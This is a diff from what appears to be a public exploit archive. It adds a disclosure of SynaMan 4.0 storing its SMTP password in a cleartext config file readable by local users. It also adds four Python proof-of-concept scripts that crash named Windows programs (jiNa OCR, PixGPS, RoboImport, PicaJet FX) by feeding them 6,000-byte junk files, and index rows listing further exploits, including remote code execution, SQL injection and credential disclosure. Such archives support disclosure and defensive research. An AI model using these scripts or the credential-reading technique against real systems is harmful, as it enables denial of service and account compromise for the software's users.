+# Twitter: @bzyo_
+# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
+# Date: 09-12-18
+# Vulnerable Software: SynaMan 4.0 build 1488
+# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
+# Version: 4.0 build 1488
+# Software Link: http://web.synametrics.com/SynaManDownload.htm
+# Tested On: Windows 7 x86
+  
+Description
+-----------------------------------------------------------------
+SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise
+
+Prerequisites
+-----------------------------------------------------------------
+Access to a system running Synaman 4 using a low-privileged user account
+ 
+Proof of Concept
+-----------------------------------------------------------------
+The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file.  This file can be viewed by any local user of the system.
+
+C:\SynaMan\config>type AppConfig.xml
+<?xml version="1.0" encoding="UTF-8"?>
+<Configuration>
+        <parameters>
+                <parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
+                <parameter name="adminEmail" type="1" value="test@gmail.com"></parameter>
+                <parameter name="smtpSecurity" type="1" value="None"></parameter>
+				**truncated**
+                <parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
+                <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
+                <parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
+        </parameters>
+</Configuration>
+
+
+ 
+Timeline
+---------------------------------------------------------------------
+05-07-18: Vendor notified of vulnerabilities
+05-08-18: Vendor responded and will fix 
+07-25-18: Vendor fixed in new release
+09-12-18: Submitted public disclosure

exploits/windows_x86/dos/45380.py

@@ -0,0 +1,25 @@
+# Exploit Title: jiNa OCR Image to Text 1.0 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-10
+# Software Link: http://www.convertimagetotext.net/downloadsoftware.php
+# Tested Version: 1.0
+# Tested on OS: Windows 7 32-bit
+
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.png".
+# Now start the program. Now when you are inside of the program attempt to convert the file "exploit.png" to pdf.
+# Now wait and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.png","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45381.py

@@ -0,0 +1,25 @@
+# Exploit Title: PixGPS 1.1.8 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-10
+# Software Link: http://www.br-software.com/pixgps11_setup.exe
+# Tested Version: 1.1.8
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. 
+# Now when you are inside of the program paste the contents of "exploit.txt" into the field:"Folder with picture files"
+# Click the "..." button and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45382.py

@@ -0,0 +1,25 @@
+# Exploit Title: RoboImport 1.2.0.72 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-11
+# Software Link: http://www.picajet.com/download/RoboImportInstall.exe
+# Tested Version: 1.2.0.72
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. 
+# Now paste the contents of "exploit.txt" into the fields:"Registration Name" & "Registration key"
+# Click the "Register" button and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45383.py

@@ -0,0 +1,25 @@
+# Exploit Title: PicaJet FX 2.6.5 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-11
+# Software Link: http://www.picajet.com/download/PicaJetFXInstall.exe
+# Tested Version: 2.6.5
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "Help" > "Register PicaJet..."
+# Now paste the contents of "exploit.txt" into the fields:"Registration Name" & "Registration Key"
+# Click the "OK" button and you will see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6096,7 +6096,15 @@ id,file,description,date,author,type,platform,port
 45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios,
 45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows,
 45357,exploits/windows_x86/dos/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",dos,windows_x86,
+45380,exploits/windows_x86/dos/45380.py,"jiNa OCR Image to Text 1.0 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
 45376,exploits/windows_x86/dos/45376.py,"HTML5 Video Player 1.2.5 - Denial of Service (PoC)",2018-09-11,T3jv1l,dos,windows_x86,
+45381,exploits/windows_x86/dos/45381.py,"PixGPS 1.1.8 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
+45382,exploits/windows_x86/dos/45382.py,"RoboImport 1.2.0.72 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
+45383,exploits/windows_x86/dos/45383.py,"PicaJet FX 2.6.5 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
+45388,exploits/windows/dos/45388.py,"iCash 7.6.5 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
+45389,exploits/windows/dos/45389.py,"PDF Explorer 1.5.66.2 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
+45390,exploits/windows/dos/45390.py,"Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
+45391,exploits/macos/dos/45391.py,"Apple macOS 10.13.4 - Denial of Service (PoC)",2018-09-12,Sriram,dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39948,3 +39956,10 @@ id,file,description,date,author,type,platform,port
 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,
 45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux,
 45375,exploits/php/webapps/45375.txt,"Bayanno Hospital Management System 4.0 - Cross-Site Scripting",2018-09-11,"Gokhan Sagoglu",webapps,php,
+45384,exploits/hardware/webapps/45384.py,"CirCarLife SCADA 4.3.0 - Credential Disclosure",2018-09-12,SadFud,webapps,hardware,
+45385,exploits/linux/webapps/45385.txt,"Rubedo CMS 3.4.0 - Directory Traversal",2018-09-12,"Marouene Boubakri",webapps,linux,
+45386,exploits/windows/webapps/45386.txt,"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)",2018-09-12,bzyo,webapps,windows,
+45387,exploits/windows/webapps/45387.txt,"SynaMan 4.0 build 1488 - SMTP Credential Disclosure",2018-09-12,bzyo,webapps,windows,
+45392,exploits/php/webapps/45392.txt,"IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection",2018-09-12,"Mohamed Sayed",webapps,php,
+45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php,
+45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,